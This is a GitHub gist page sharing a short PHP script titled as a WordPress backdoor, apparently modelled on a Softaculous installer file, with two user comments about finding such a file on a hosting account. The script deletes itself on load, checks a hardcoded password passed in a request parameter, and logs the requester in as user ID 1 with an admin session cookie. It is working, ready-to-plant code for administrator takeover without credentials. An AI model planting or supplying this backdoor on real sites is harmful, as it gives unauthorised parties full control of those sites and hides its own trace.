Skip to content

Instantly share code, notes, and snippets.

@bi0xid bi0xid/access.php
Created Nov 3, 2016

Embed
What would you like to do?
Create a backdoor to WP access (softaculous)
<?php
@unlink(__FILE__);
// Validate if the request is from Softaculous
if($_REQUEST['pass'] != 'mv8gdj4ohqfxpu34yj5ursupfabcmvdm'){ // your password here
die("Unauthorized Access");
}
require('wp-blog-header.php');
require('wp-includes/pluggable.php');
$user_info = get_userdata(1);
// Automatic login //
$username = $user_info->user_login;
$user = get_user_by('login', $username );
// Redirect URL //
if ( !is_wp_error( $user ) )
{
wp_clear_auth_cookie();
wp_set_current_user ( $user->ID );
wp_set_auth_cookie ( $user->ID );
$redirect_to = user_admin_url();
wp_safe_redirect( $redirect_to );
exit();
}
@drjohndimi

This comment has been minimized.

Copy link

drjohndimi commented Jan 31, 2017

Hello.
What is the code for exactly, please?
I installed WP recently on cPanel but I got a 403/4 error when I went to mydomain.com/wp-admin
I then went into the cPanel folders and saw a php file with a strange name and inside it had a code similar to yours.
I was quite frustrated and I planned to delete it because I don't see it on my other hosting account.
My hosting company have not been able to give me a solid answer yet about the file.
Your voice on this matter means a lot to me - Should I delete this strange php file?
Thank you.
JD

@kokriwala

This comment has been minimized.

Copy link

kokriwala commented Feb 7, 2018

This is a backdoor file to access your root directory.
I will strongly recommend you to install the WordPress manually instead of using this online software.
Don't forget to remove this file from your server and scan your home directory at least once.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.